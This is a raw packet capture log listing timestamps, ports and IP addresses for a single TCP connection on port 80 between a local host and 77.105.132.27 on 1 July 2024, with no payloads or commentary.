Jul 1, 2024 09:16:14.065009117 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.065022945 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.065037012 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.065043926 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.065053940 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.065067053 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.065073013 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.065088034 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.065088987 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.065114021 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.065138102 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.065440893 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.065455914 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.065481901 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.065498114 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.065505028 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.065519094 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.065526009 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.065534115 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.065547943 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.065562010 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.065562963 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.065577030 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.065587997 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.065592051 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.065606117 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.065608025 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.065622091 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.065623999 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.065637112 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.065649033 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.065653086 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.065664053 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.065684080 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.065700054 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.066453934 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.066469908 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.066483974 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.066493034 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.066498041 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.066507101 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.066513062 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.066523075 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.066526890 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.066540956 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.066545010 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.066556931 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.066570044 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.066582918 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.066586018 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.066600084 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.066608906 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.066613913 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.066625118 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.066627979 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.066646099 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.066651106 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.066683054 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.067260027 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.067276001 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.067291021 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.067306042 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.067312956 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.067326069 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.067346096 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.067372084 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.108576059 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.108674049 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.108750105 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.108766079 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.108782053 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.108798981 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.108799934 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.108808041 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.108822107 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.108838081 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.108860970 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.154522896 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.154561043 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.154584885 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.154602051 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.154618979 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.154613972 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.154614925 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.154689074 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.154705048 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.154722929 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.154722929 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.154743910 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.154782057 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.154797077 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.154855013 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.154875040 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.154890060 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.154953957 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.155019999 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.155034065 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.155057907 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.155069113 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.155069113 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.155072927 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.155102015 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.155122995 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.155284882 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.155350924 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.155365944 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.155380011 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.155396938 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.155397892 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.155430079 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.155459881 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.155759096 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.155774117 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.155798912 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.155812025 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.155814886 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.155827045 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.155843019 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.155850887 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.155858040 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.155872107 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.155874968 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.155889988 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.155899048 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.155905962 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.155915976 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.155940056 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.156775951 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.156826973 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.156838894 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.156853914 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.156874895 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.156902075 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.156976938 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.156992912 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.157022953 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.157058001 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.157130003 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.157145023 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.157176971 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.157205105 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.157277107 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.157291889 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.157309055 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.157325983 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.157351971 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.157351971 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.157352924 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.157377958 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.157398939 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.157406092 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.157414913 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.157438040 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.157466888 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.157644033 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.157658100 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.157674074 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.157690048 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.157696962 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.157728910 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.157757998 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.157789946 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.157804012 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.157819033 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.157844067 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.157871962 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.157951117 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.157965899 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.157980919 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.157995939 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.158013105 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.158039093 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.158226967 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.158241987 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.158257008 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.158272028 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.158284903 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.158286095 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.158303022 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.158308983 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.158319950 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.158332109 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.158335924 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.158366919 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.158391953 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.158591986 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.158653975 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.158761978 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.158776999 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.158793926 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.158809900 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.158812046 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.158827066 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.158842087 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.158854008 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.158854008 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.158855915 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.158871889 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.158879995 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.158886909 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.158902884 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.158911943 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.158927917 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.158952951 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.159354925 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.159372091 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.159385920 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.159399986 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.159415007 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.159423113 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.159430027 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.159445047 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.159447908 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.159461021 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.159467936 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.159476042 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.159488916 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.159492016 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.159517050 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.159548998 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.159687996 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.159785986 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.159801960 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.159816980 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.159838915 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.159846067 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.159854889 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.159869909 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.159884930 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.159895897 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.159915924 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.159941912 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.160147905 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.160162926 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.160176992 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.160195112 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.160207987 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.160218954 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.160226107 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.160233974 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.160248995 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.160247087 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.160264015 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.160279989 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.160286903 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.160295010 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.160304070 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.160311937 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.160326958 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.160331011 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.160346985 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.160373926 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.160828114 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.160845041 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.160882950 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.160914898 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.203372955 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.203408957 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.203432083 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.203444958 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.203457117 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.203470945 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.203480959 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.203485012 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.203526020 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.203564882 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.203577042 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.203607082 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.249135971 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249166965 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249178886 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249185085 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249195099 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249206066 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249212980 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.249217987 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249249935 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.249284983 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.249319077 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249361038 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.249396086 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249428988 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249439001 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249450922 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249456882 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.249463081 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249476910 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.249505043 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.249614000 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249624968 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249635935 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249646902 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.249650002 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249660969 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249684095 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.249710083 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.249866962 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249877930 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249888897 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249900103 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249903917 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.249910116 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.249923944 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.249949932 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.250245094 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.250257015 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.250267029 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.250277996 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.250291109 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.250293970 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.250305891 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.250310898 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.250318050 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.250329971 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.250354052 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.251243114 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.251254082 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.251265049 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.251288891 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.251317024 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.251378059 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.251389027 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.251399994 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.251414061 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.251422882 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.251424074 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.251436949 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.251461983 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.251631021 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.251648903 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.251658916 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.251677990 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.251698971 CEST	49752	80	192.168.2.4	77.105.132.27
